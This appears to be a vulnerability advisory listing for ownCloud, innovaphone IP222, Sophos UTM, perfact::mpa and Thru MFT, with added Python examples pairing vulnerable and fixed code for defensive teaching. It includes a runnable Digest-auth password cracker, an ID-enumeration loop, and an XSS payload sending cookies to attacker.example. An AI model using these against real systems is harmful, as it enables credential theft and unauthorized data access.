ownCloud versions 8.2.1 and below, 8.1.4 and below, and 8.0.9 and below suffer from an information exposure vulnerability via directory listings.
2a03e49b47f5b92a36e0f7c8b25d095b6e9255abca3e8fe34b1f15409b04a89c
OwnCloud version 8.1.8 suffers from a username disclosure vulnerability.
0307de97c325435adcb9198b8abdd9f7094e634c0324db4c86daa7772020153a
ownCloud version 10.3.0 Stable suffers from a cross site request forgery vulnerability.
c22b2a37ba5d1cb6b5858d7411c84b3b052ad0aa8deb6f83ddf846ab7d9d2e99
ownCloud version 0.1.2 suffers from a user impersonation authorization bypass vulnerability.
29b952619c8992a8a4ce5753eaedfa7b6eaafa33618c92674d49b3731375dc42
ownCloud version 3.7.3 for iOS suffers from a cross site scripting vulnerability.
60a743c516f85803a1928a7f4848da9eaf304718636f0a2239685f689d400f9c
OwnCloud Server versions 8.1 through 10.0 suffer from a user enumeration vulnerability.
f37e67829e665a898bf68c2848f71f8bc90ffbb5b72d6424387b5e59ac1e5c43
NextCloud and OwnCloud suffer from a cross site scripting vulnerability in their error pages. OwnCloud versions 9.1.5 and below are affected. NextCloud versions prior to 11.0.3, 10.0.5, and 9.0.58 are affected.
65879de6c3bc16a06a84fa76fc56c4fec014ee26d19bb377b0cde628a8e097a2
ownCloud version 10.0.1 appears to be missing multiple security patches, including fixes for cross site scripting and other issues.
e3c48c0271c0c89ae80ecf8f0d0ab034e903539703cefb633858b163ea696d4b
ownCloud's desktop client versions up to 2.2.2 suffer from a local privilege escalation vulnerability.
b2623943c1aa93651044b4c1a58687459e6c32e5ec23cc3c6403bce318ee3b99
The innovaphone IP222 provides a password-protected administration interface that is accessed via a web browser. Although basic authentication is disabled and digest authentication is used instead, brute-force attacks against the password authentication process are still possible: digest authentication only protects the credential in transit and does not by itself limit the number of guesses an attacker can make.
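The following is an added example for this listing, not code from innovaphone or SySS GmbH. It shows why moving from Basic to Digest authentication does not stop password guessing: for every candidate password the attacker can compute the RFC 2617 response value and compare it, either online against the device or offline against one captured Authorization header. The realm, nonce, URI and password are constructed sample values; no real device data is involved.

```python
"""HTTP Digest (RFC 2617, qop=auth) password guessing against a captured header.

Added example; not innovaphone or SySS GmbH code.  SAMPLE, the wordlist and
the password are constructed test data.
"""
import hashlib
import re
from typing import Iterable, Optional


def _md5(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """Client 'response' value as RFC 2617 defines it for qop=auth."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def parse_authorization(header: str) -> dict:
    """Split 'Digest k="v", k2=v2, ...' into a dict (quoted or bare values)."""
    body = header.split(" ", 1)[1]
    fields = {}
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]*))', body):
        fields[key] = quoted or bare
    return fields


def crack_digest(header: str, method: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the wordlist entry that reproduces the captured response, if any."""
    f = parse_authorization(header)
    for candidate in wordlist:
        guess = digest_response(f["username"], f["realm"], candidate, method,
                                f["uri"], f["nonce"], f["nc"], f["cnonce"],
                                f.get("qop", "auth"))
        if guess == f["response"]:
            return candidate
    return None


# Constructed sample: parameters of one challenge/response exchange with the phone.
SAMPLE = dict(username="admin", realm="innovaphone-IP222", nonce="6f1a2b3c4d5e6f70",
              nc="00000001", cnonce="0a4f113b", uri="/admin/", qop="auth")


def build_authorization(password: str, method: str = "GET") -> str:
    """Header a legitimate client would send for SAMPLE (used to fake a capture)."""
    resp = digest_response(password=password, method=method, **SAMPLE)
    return ('Digest username="{username}", realm="{realm}", nonce="{nonce}", uri="{uri}", '
            'qop={qop}, nc={nc}, cnonce="{cnonce}", response="{resp}"').format(resp=resp, **SAMPLE)


CAPTURED_HEADER = build_authorization("phone123")   # what a sniffer on the LAN would see
WORDLIST = ["admin", "123456", "innovaphone", "phone123", "letmein"]

if __name__ == "__main__":
    print("recovered password:", crack_digest(CAPTURED_HEADER, "GET", WORDLIST))
```

The online variant is the same loop with the request sent to the device instead of compared locally; the only effective countermeasure is on the server side (lockout or rate limiting per account or source, and a strong password), not the choice of Basic versus Digest.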
5a2d36d564fe004b8101678bcdc007666e0547fe8e23b7a50847efbc69680872
At startup the innovaphone IP222 sends an HTTP request for a special PNG file to the associated server system. Once the download has finished, the image is displayed on the phone when the receiver screen is selected in the menu. Serving a large image file (6.9 MB) in this download and then selecting the receiver screen on the phone crashes the application and causes a denial of service condition. Remote code execution via this vulnerability may also be possible, but was not confirmed by SySS GmbH.
082b8f3575ba36bdc1044ed8d817104a1afb0c9d70e9163c8f9dfb60e5762b1a
The innovaphone IP222 supports different signalling protocols, such as H.323 and SIP. The vulnerability lies in the SIP over UDP implementation: a specially crafted SIP request sent to the open port 5060/UDP immediately crashes the innovaphone IP222 phone, causing a denial of service condition. Remote code execution via this vulnerability may also be possible, but was not confirmed by SySS GmbH.
cfc0d7614928d7e4d648a995ef8fdeb119a75e0ac44cc1cd7ece00e5e46a6931
innovaphone versions IP222 and IP232 suffer from a remote denial of service vulnerability.
82d16c58171e185f50439ca2a3e3a97783090e29049d727064dcd3b319f9348e
Inserting an HTML script tag into the URL of a web site protected by a Sophos UTM 525 yields an error page that reflects the tag unfiltered. Executing malicious JavaScript in the victim's browser (reflected cross site scripting) is therefore straightforward.
1eceff53bf6b122d6139c8726d40ddfbec1d153d9f984494053dc00259fcd5f7
SySS GmbH found that several functions of the perfact::mpa web application are prone to persistent cross-site scripting attacks due to insufficient validation of user input.
3de9ebd0a6d7d71bc98db0dbfca47d2036e6cb55c8c5730f0710bc34b796c3d7
SySS GmbH found that several resources of the perfact::mpa web application can be accessed directly by anyone who knows the correct URL, because the application does not perform proper authorization checks. Unauthorized users can therefore use functions of perfact::mpa that should be restricted.
9ddb061b9a0b9ab1cc362d42499ce13c2180721efde797ef3793f8df0246c9b2
SySS GmbH found that the perfact::mpa web application accepts user-controlled input in the URL parameter "redir" and redirects to it without validation, so victims can be sent to an arbitrary site. This open redirect makes phishing attacks easier, because the link the victim clicks points at the trusted perfact::mpa host.
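As an added example (not perfact or SySS GmbH code), the unchecked use of a redirect parameter beside a checked version. The application origin, the parameter name "redir" as a function argument and the attacker inputs are constructed assumptions. The safe version accepts only a root-relative path on the application itself and falls back to a default page for everything else, including the protocol-relative and backslash forms that naive prefix checks miss.

```python
"""Open redirect via a redirect parameter: vulnerable and checked handling.

Added example; not perfact or SySS GmbH code.  APP_BASE and CASES are
constructed sample data.
"""
from urllib.parse import urljoin, urlparse

APP_BASE = "https://mpa.example.com/"   # assumed application origin
DEFAULT_TARGET = "/"                    # landing page used when redir is rejected


def redirect_target_vulnerable(redir: str) -> str:
    # Whatever arrives in the parameter becomes the Location header.
    return redir


def redirect_target_safe(redir: str) -> str:
    """Return redir only if it is a path on this application, else DEFAULT_TARGET."""
    if not redir or "\\" in redir or "\r" in redir or "\n" in redir:
        # Browsers treat '/\host' like '//host'; CR/LF would split the header.
        return DEFAULT_TARGET
    parts = urlparse(redir)
    if parts.scheme or parts.netloc:
        # Absolute URL (https://..., javascript:...) or protocol-relative //host.
        return DEFAULT_TARGET
    if not redir.startswith("/") or redir.startswith("//"):
        # Only root-relative paths are accepted.
        return DEFAULT_TARGET
    # Belt and braces: resolve against our origin and confirm the host is ours.
    if urlparse(urljoin(APP_BASE, redir)).hostname != urlparse(APP_BASE).hostname:
        return DEFAULT_TARGET
    return redir


# Constructed inputs an attacker would place in a phishing link, with expected results
CASES = {
    "/sessions/42": "/sessions/42",
    "https://evil.example/login": DEFAULT_TARGET,
    "//evil.example/login": DEFAULT_TARGET,
    "/\\evil.example": DEFAULT_TARGET,
    "javascript:alert(document.cookie)": DEFAULT_TARGET,
    "": DEFAULT_TARGET,
}

if __name__ == "__main__":
    for redir, expected in CASES.items():
        print(repr(redir), "->", redirect_target_safe(redir), "(expected", expected + ")")
```

Where the application genuinely needs to redirect off-site, an allow-list of permitted hosts compared against `urlparse(...).hostname` is the right extension; string prefix checks such as `redir.startswith("https://mpa.example.com")` are bypassed by `https://mpa.example.com.evil.example/`.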
1240006c91f037df38cbcd2cbcc641d8f0ac32f2445fa4d65f159730f692deb7
SySS GmbH found that any logged-in user is able to download valid VPN configuration files for arbitrary existing remote sessions. All an intruder needs to know is the URL with the dynamic parameter "brsessid". Because this value is an incrementing integer, it can simply be modified to enumerate and download a valid VPN configuration file for every existing remote session.
0395cba8a67f491b8450abca96173ea16da49abe7cd6b3f2d88cf3e02d04710c
The tested perfact::mpa web application offers no protection against cross-site request forgery (CSRF). In this kind of attack, an end user's browser is made to perform unwanted actions in a web application in which the user is currently authenticated.
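As an added example (not perfact or SySS GmbH code), a state-changing handler with no CSRF protection beside one that requires an HMAC-based synchronizer token bound to the session. Requests are modelled as plain dicts of cookies and form fields; the session store, the "terminate remote session" action and the server key are constructed assumptions. The forged request carries the victim's session cookie, because the browser attaches it automatically, but it cannot carry a token minted for that session.

```python
"""CSRF: unprotected handler beside a synchronizer-token protected one.

Added example; not perfact or SySS GmbH code.  Sessions, requests and the
action are constructed sample data.
"""
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)             # per-deployment secret, assumed
SESSIONS = {"sid-alice": {"user": "alice"}}       # cookie value -> session


def fresh_state() -> dict:
    """Per-user application state: ids of the user's remote sessions."""
    return {"alice": {"remote_sessions": {17, 18}}}


def make_csrf_token(session_id: str) -> str:
    """Fresh token: random nonce plus a MAC over (session id, nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token) -> bool:
    """True only if the token was minted for this exact session."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def delete_remote_session_vulnerable(request: dict, state: dict) -> str:
    # Only the session cookie is checked, which any cross-site form submission carries.
    sess = SESSIONS.get(request["cookies"].get("sid"))
    if not sess:
        return "401 not logged in"
    state[sess["user"]]["remote_sessions"].discard(int(request["form"]["brsessid"]))
    return "200 deleted"


def delete_remote_session_safe(request: dict, state: dict) -> str:
    sid = request["cookies"].get("sid")
    sess = SESSIONS.get(sid)
    if not sess:
        return "401 not logged in"
    if not verify_csrf_token(sid, request["form"].get("csrf_token")):
        return "403 csrf token missing or invalid"
    state[sess["user"]]["remote_sessions"].discard(int(request["form"]["brsessid"]))
    return "200 deleted"


def forged_request(brsessid: int) -> dict:
    """What arrives when the victim's browser submits an attacker's auto-posting form."""
    return {"cookies": {"sid": "sid-alice"}, "form": {"brsessid": str(brsessid)}}


def legitimate_request(brsessid: int) -> dict:
    """What the application's own form submits: the token it embedded for this session."""
    token = make_csrf_token("sid-alice")
    return {"cookies": {"sid": "sid-alice"},
            "form": {"brsessid": str(brsessid), "csrf_token": token}}


def run_demo() -> dict:
    """Exercise both handlers on fresh state; returns status and remaining session ids."""
    out = {}
    s = fresh_state()
    out["vulnerable_forged"] = (delete_remote_session_vulnerable(forged_request(17), s),
                                sorted(s["alice"]["remote_sessions"]))
    s = fresh_state()
    out["safe_forged"] = (delete_remote_session_safe(forged_request(17), s),
                          sorted(s["alice"]["remote_sessions"]))
    s = fresh_state()
    out["safe_legit"] = (delete_remote_session_safe(legitimate_request(18), s),
                         sorted(s["alice"]["remote_sessions"]))
    return out


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result)
```

Setting the session cookie with `SameSite=Lax` or `Strict` is a worthwhile second layer, but it depends on browser support and does not cover same-site subdomains, so the token check stays.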
2b1425b7f0db4e14f7b33d9778f0a59b7e1c1b93b42771c51ac1b69ae8116af3
SySS GmbH found that unauthorized users are able to download arbitrary files that other users have uploaded via the file upload functionality. As the file names of uploaded files are incrementing integer values, all uploaded files can be enumerated and downloaded without any authorization.
b599bdab77ad574016e3a7c31c5ca968b8a2daac827a37f269eb26e143e5fe99
SySS GmbH found that the request-new-user and translation functionalities of the perfact::mpa web application are prone to reflected cross-site scripting attacks.
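As an added example covering the cross-site scripting entries above (the Sophos UTM 525 error page and the reflected and persistent findings in perfact::mpa), not code from Sophos, perfact or SySS GmbH: an error page that reflects the requested URL and a stored profile field rendered inside an attribute, each beside the fixed version. The fix is the same in both cases, encode untrusted data for the HTML context it lands in at output time. The page templates and the two payloads are constructed sample data; a small parser counts what a browser would execute.

```python
"""Reflected and stored XSS: unencoded output beside context-correct encoding.

Added example; not Sophos, perfact or SySS GmbH code.  Templates and payloads
are constructed test data.
"""
import html
from html.parser import HTMLParser

# Constructed attacker inputs
REFLECTED_PAYLOAD = ("/docs/<script>document.location='https://attacker.example/?c='"
                     "+document.cookie</script>")
STORED_PAYLOAD = 'Mary" onfocus="alert(document.cookie)" autofocus="'


def error_page_vulnerable(requested_path: str) -> str:
    # Raw path dropped into the body: any tag in the URL is rendered by the browser.
    return f"<html><body><h1>Not found</h1><p>No page at {requested_path}</p></body></html>"


def error_page_safe(requested_path: str) -> str:
    # html.escape turns < > & " ' into entities: the path is displayed, never parsed.
    safe = html.escape(requested_path, quote=True)
    return f"<html><body><h1>Not found</h1><p>No page at {safe}</p></body></html>"


def profile_form_vulnerable(display_name: str) -> str:
    # Stored value rendered inside a quoted attribute without encoding.
    return f'<input type="text" name="display_name" value="{display_name}">'


def profile_form_safe(display_name: str) -> str:
    # quote=True is what keeps the value from closing the attribute.
    return f'<input type="text" name="display_name" value="{html.escape(display_name, quote=True)}">'


class _Inspector(HTMLParser):
    """Count script elements and on* event-handler attributes the browser would see."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.event_handlers += sum(1 for name, _ in attrs if name.startswith("on"))


def active_content(markup: str) -> int:
    """Number of script tags plus inline event handlers in the rendered markup."""
    p = _Inspector()
    p.feed(markup)
    p.close()
    return p.script_tags + p.event_handlers


if __name__ == "__main__":
    for label, page in [("error page, raw", error_page_vulnerable(REFLECTED_PAYLOAD)),
                        ("error page, escaped", error_page_safe(REFLECTED_PAYLOAD)),
                        ("profile form, raw", profile_form_vulnerable(STORED_PAYLOAD)),
                        ("profile form, escaped", profile_form_safe(STORED_PAYLOAD))]:
        print(f"{label}: {active_content(page)} executable item(s)")
```

Input validation at submission time (the cause named in the perfact::mpa advisory) is useful but not sufficient on its own, because the same stored value may later be emitted into a text node, an attribute, a URL or a script block, each of which needs its own encoding.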
c41cae5aadb2813a38940d61e582bbde74c6eac30c32083652ec5ccf789a03e0
OpenCms version 9.5.2 suffers from a cross site scripting vulnerability.
90836f4c2cffaaf16a53502663f30a5c82ff5d7140b8933a573d1c03a30e34a1
Thru Managed File Transfer Portal version 9.0.2 suffers from an insecure direct object reference vulnerability in the contacts list functionality.
04bf2eec97770c7bbdcc28f9522714c4b0542d404957116ca9741cfcd118f04a
Thru Managed File Transfer Portal version 9.0.2 suffers from an insecure direct object reference vulnerability in the upload functionality.
f0fc879814ce1f79dd42f81a3bfde9648a14d4d21f9c544a934eff7660ae4c39
The Thru Managed File Transfer application version 9.0.2 allows both unauthenticated and authenticated users to upload files, including viruses.
178fc60f24aa280af3d976a9ac3ef913d89f1c7872bc906e522d80c60a97306b
Thru Managed File Transfer Portal version 9.0.2 suffers from an insecure direct object reference vulnerability that references log data.
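As an added example covering the insecure direct object reference entries on this page (the perfact::mpa "brsessid" VPN configuration download and the sequential upload file names, and the Thru Managed File Transfer contacts, upload and log references), not code from perfact, Thru or SySS GmbH: a download handler that only checks for a login beside one that checks ownership, plus the enumeration loop an authenticated intruder runs against sequential ids. Record contents, ids and handler names are constructed assumptions.

```python
"""Insecure direct object reference on sequential ids: missing ownership check,
the fixed handler, and the enumeration loop that exploits the missing check.

Added example; not perfact, Thru or SySS GmbH code.  RECORDS is constructed
sample data.
"""
import secrets
from typing import Callable, Dict

# Constructed store: brsessid -> owner and the VPN configuration text it yields
RECORDS = {
    1001: {"owner": "alice", "vpn_config": "remote 10.0.0.1 1194\nkey alice-key"},
    1002: {"owner": "bob",   "vpn_config": "remote 10.0.0.2 1194\nkey bob-key"},
    1003: {"owner": "carol", "vpn_config": "remote 10.0.0.3 1194\nkey carol-key"},
}


class NotFound(Exception):
    """Raised uniformly for 'no such record' and 'not your record'."""


def download_vulnerable(user: str, brsessid: int) -> str:
    # Caller has already verified that 'user' is logged in; the id itself is trusted.
    rec = RECORDS.get(brsessid)
    if rec is None:
        raise NotFound
    return rec["vpn_config"]


def download_safe(user: str, brsessid: int) -> str:
    # Authorization is decided per object: the record must belong to the caller.
    rec = RECORDS.get(brsessid)
    if rec is None or rec["owner"] != user:
        raise NotFound            # same error either way, so ids cannot be probed for existence
    return rec["vpn_config"]


def enumerate_ids(user: str, fetch: Callable[[str, int], str],
                  start: int, stop: int) -> Dict[int, str]:
    """What an authenticated intruder does: walk the id range and keep every download."""
    found = {}
    for brsessid in range(start, stop + 1):
        try:
            found[brsessid] = fetch(user, brsessid)
        except NotFound:
            continue
    return found


def new_opaque_id() -> str:
    """Defense in depth for new records: an unguessable handle instead of a counter.

    This makes the range walk above infeasible but does not replace the
    ownership check in download_safe; a leaked or shared handle must still
    be refused for the wrong user.
    """
    return secrets.token_urlsafe(16)


if __name__ == "__main__":
    print("without ownership check:", sorted(enumerate_ids("bob", download_vulnerable, 1000, 1010)))
    print("with ownership check:   ", sorted(enumerate_ids("bob", download_safe, 1000, 1010)))
    print("example opaque id:      ", new_opaque_id())
```

The same per-object check applies to uploaded files, contact lists and log entries: the question at every fetch is not "is the caller logged in" but "is the caller allowed to see this particular object".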
2147fd1a7ff3b5ec34b6336e5ee66f68da4bfc155effb2b3a760db009af938d9